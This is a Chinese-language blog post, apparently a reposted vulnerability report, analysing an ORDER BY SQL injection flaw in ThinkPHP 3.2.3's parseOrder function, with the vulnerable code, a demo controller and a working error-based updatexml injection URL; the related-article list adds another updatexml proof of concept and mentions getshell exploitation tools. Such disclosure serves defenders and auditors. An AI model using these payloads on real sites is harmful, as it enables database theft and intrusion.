php tp框架的特性,ThinkPHP框架特性引发的SQL注入漏洞

最新推荐文章于 2024-05-10 20:58:45 发布
最新推荐文章于 2024-05-10 20:58:45 发布
阅读量289 收藏 1
点赞数

ThinkPHP SQL注入 漏洞分析 代码安全 框架漏洞
关键词由CSDN通过智能技术生成

### 简要描述:

ThinkPHP框架本身缺陷导致SQL注入漏洞,基本影响所有使用ThinkPHP开发的应用,包括thinksns、onethink等

### 详细说明:

关键代码在`\ThinkPHP\Library\Think\Db\Driver.class.php`,683行。

```

/**

* order分析

* @access protected

* @param mixed $order

* @return string

*/

protected function parseOrder($order) {

if(is_array($order)) {

$array = array();

foreach ($order as $key=>$val){

if(is_numeric($key)) {

$array[] = $this->parseKey($val);

}else{

$array[] = $this->parseKey($key).' '.$val;

}

}

$order = implode(',',$array);

}

return !empty($order)? ' ORDER BY '.$order:'';

}

```

当我们提交的$order不为数组时,那么直接返回 `' ORDER BY '.$order:'`。

当我们提交的$order为数组,程序也仅仅是对$key进行了处理。没有处理$val。

此漏洞与phith0n提交的漏洞有相似性。http://**.**.**.**/bugs/wooyun-2010-086737

在此附上一个常见的demo

```

namespace Home\Controller;

use Think\Controller;

class IndexController extends Controller {

public function index(){

$data = array();

$data['username'] = array('eq','admin');

$order = I('get.order');

$m = M('user')->where($data)->order($order)->find();

echo M('user')->getLastSql();

}

}

```

通过I函数获取内容以后,直接进入SQL。

```

**.**.**.**/official/thinkphp_3.2.3_full/?order=updatexml%281,concat%280x3a,%28select%20username%20from%20user%20limit%201%29%29,1%29

```

[order 注入.JPG](https://images.seebug.org/upload/201510/3016141709a9b502c87cbb9e56a4c05e258e62c8.jpg)

之前看了一下ThinkPHP的审核情况,某些问题被官方认为是开发不规范导致的。我个人看法是在安全性的前提下,尽量提高程序的灵活性。毕竟大家使用ThinkPHP框架的目的是为了敏捷开发,同时还能减少安全性等问题带来的顾虑。之前听前辈们说过一句话,“一切输入都是有害的”。以此为标准,那么即使向框架内的基础函数输入恶意数据,程序也应该保证能进行识别和过滤。很多框架实际上也是这么做的。

### 漏洞证明:

![](https://images.seebug.org/upload/201510/3016141709a9b502c87cbb9e56a4c05e258e62c8.jpg)

loading-bars.svg

黑暗中的韭菜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp漏洞图形化综合利用工具
05-23
Thinkphp(GUI)漏洞综合利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的支持) JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)。 检测不到的payload欢迎提交payload至issues。 这个真的超级好用,推荐推荐
Thinkphp3.2.3 SQL注入漏洞
Sentiment的博客
05-20 4513
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 ThinkPHP/Conf/convention.php配置下数据库,我这里直接用的sqllabs的数据库 写个查询入口Application/Home/Controller/IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class IndexController ex
2024年ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,2024年最新网络安全面试数据结构算法
最新发布
2401_84301389的博客
05-10 1423
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
thinkphp3.2.3漏洞_实操web漏洞验证——OpenSSL POODLE 漏洞
weixin_39788740的博客
11-24 1348
今天我们来讲一下实战操作验证OpenSSL POODLE漏洞的方法,以下的操作实例都是通过漏洞扫描系统,扫描出存在相应漏洞的站点URL,由于系统存在一些误报,所以必须经过人工验证,才能确定漏洞的确存在。一、漏洞概述POODLE即Padding Oracle On Downgraded Legacy Encryption.是安全漏洞(CVE-2014-3566)的代号,俗称“贵宾犬”漏洞。 此漏洞是...
10-PHP代码审计——thinkphp3.2.3 update注入漏洞
网络安全
05-06 879
实验环境的poc: http://www.tptest.com/index.php/home/index/index?username[0]=bind&username[1]=0%20and%201=(updatexml(1,concat(0x3a,(user())),1))%23&password=123456 通过更改用户密码的案例来分析update注入漏洞的过程: 在分析之前,先梳理一下漏洞利用的过程,update注入的流程是:M函数 --> where函...
thinkphp漏洞利用工具-thinkphp_gui_tools(三)
siu~
08-17 3708
ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过
33hao TP框架 多商家 分销
12-18
33hao系统应包含防止SQL注入、XSS攻击、CSRF攻击等安全措施,同时保证用户数据的加密存储,尤其是涉及支付环节时,需遵循PCI DSS等安全标准。 7. **API接口**:为了与其他系统(如物流、支付平台)对接,系统可能...
thinkphp5.1.39、tp5.1.39版本
06-01
ThinkPHP5.1.39,简称tp5.1.39,是ThinkPHP框架的一个重要版本,它在原有的基础上进行了多方面的优化和改进,旨在提供更高效、稳定且易于使用的开发环境。本文将对这个版本的特性、优势以及常见应用进行详尽的探讨。...
TP5框架安全机制实例分析
12-18
本文将深入探讨TP5框架的安全机制,重点在于防止SQL注入和表单合法性检测。 **防止SQL注入** SQL注入是一种常见的安全漏洞,攻击者可以通过输入恶意SQL代码来操纵数据库。在TP5中,有以下两种方法来防止这种攻击:...
thinkphp 一键漏洞检测
12-09
通过自动化的漏洞扫描,可以发现潜在的安全弱点,例如SQL注入、XSS跨站脚本、文件包含漏洞、命令执行等。这些漏洞如果不及时处理,可能会导致数据泄露、系统瘫痪甚至被黑客控制。因此,使用"thinkphp 一键漏洞检测...
thinkPhp5.0.24框架
02-23
ThinkPhp5.0.24,作为国内广泛应用的PHP开发框架,以其简洁、高效、易学的特性,深受开发者喜爱。这个版本在ThinkPhp5系列中占有重要地位,它在继承前代优点的基础上,对架构进行了优化,提升了性能,并引入了更多...
OneThink前台注入分析1
08-03
OneThink前台注入分析OneThink 前台注入进后台分析我是某次授权的渗透过程中,遇到了 OneThink,那么经过一番审计和尝试,最终实现了 OneT
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3846
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQLSqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架
ThinkPhp3.2.3缓存漏洞复现以及修复建议
飞鱼计划
04-18 9774
ThinkPhp3.2.3缓存漏洞复现以及修复建议 今天早上无意间看到thinkphp的缓存漏洞,小编在实际开发过程中用thinkphp3.2.3挺多的。 漏洞原文链接:https://xianzhi.aliyun.com/forum/read/1973.html有兴趣的小伙伴可以去详细的学习一下 我们这里来复现一下漏洞 后面我会提出修复建议 首先我们下载最新的thinkphp...
thinkphp漏洞利用工具-ThinkphpGUI(一)
siu~
08-17 3801
Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
ThinkPHP3.2.3 反序列化漏洞复现
D.MIND 的博客
06-08 1235
ThinkPHP/Library/Think/Image/Driver/Imagick.class.php: __destruct() public function __destruct() { empty($this->img) || $this->img->destroy(); } ThinkPHP/Library/Think/Session/Driver/Memcache.class.php destroy() public function destroy($sessI
[复现]Thinkphp3.2.3 漏洞
热门推荐
kuuhh的博客
08-02 1万+
前言 纸上得来终觉浅,绝知此事要躬行。 日志泄露 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且日志结构容易被猜解,造成信息泄露。 THINKPHP3.1结构:Runtime/Logs/Home/年份_月份_日期.log THINKPHP3.2 结构:Application/Runtime/Logs/Home/年份_月份_日期.log 需要注意的是日志的路径不是绝对的,开发者可以修改的,平时可以收集下用时fuzz。 SQL 注入 user表 一个小例子 代码如下 $id
thinkphp3.2.3漏洞_TPscan一键ThinkPHP漏洞检测工具
weixin_39820244的博客
11-25 6513
1.简要描述这个工具写完有一段时间了,看网上目前还没有一个thinkphp漏洞集成检测工具,所以打算开源出来。2.代码结构插件化思想,所有的检测插件都在plugins目录里,TPscan.py主文件负责集中调度。插件目录:ThinkPHP 用户模块checkcode SQL注入漏洞ThinkPHP 5.0.23远程代码执行ThinkPHP 5.0.23 Debug模式远程代码执行Thi...
【安全漏洞ThinkPHP 3.2.3 漏洞复现
HBohan的博客
09-04 1629
$this->show 造成命令执行 在 Home\Controller\IndexController 下的index中传入了一个可控参数,跟进调试看一下。 class IndexController extends Controller { public function index($n='') { $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ paddi
ThinkPHP5.0框架详解:快速开发与核心特性
"这篇文档是关于ThinkPHP5.0的最新完整手册,涵盖了从框架的基础安装到高级特性的全面教程,旨在帮助开发者更好地理解和运用这个轻量级PHP开发框架ThinkPHP5.0强调简洁实用,支持敏捷WEB应用开发,且遵循Apache2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值